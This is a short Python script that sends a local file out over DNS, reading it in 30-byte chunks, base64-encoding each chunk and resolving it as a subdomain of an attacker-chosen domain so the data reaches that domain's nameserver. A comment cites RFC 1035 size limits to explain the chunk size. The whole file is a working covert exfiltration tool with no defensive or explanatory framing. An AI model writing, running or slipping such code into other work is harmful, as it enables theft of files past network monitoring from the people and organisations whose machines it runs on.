#!/usr/bin/python

from socket import gethostbyname
from base64 import standard_b64encode
from sys import argv
from time import sleep

local_filename = argv[1]
remote_filename = argv[2]
base_domain = argv[3]

# Why are chunks so small?
# From RFC 1035, these are the size limits for DNS:
#    labels          63 octets or less
#    names           255 octets or less
#    TTL             positive values of a signed 32 bit number.
#    UDP messages    512 octets or less
#
# Bad math: about label-size/2 to allow for base64 padding.

chunk_size = 30
with open(local_filename, 'rb') as f:
    while True:
        data = f.read(chunk_size)
        if not data: break
        domain = '.'.join([standard_b64encode(data).decode('utf-8'), remote_filename, base_domain])
        print(domain)
        try:
            gethostbyname(domain)
        except:
            pass
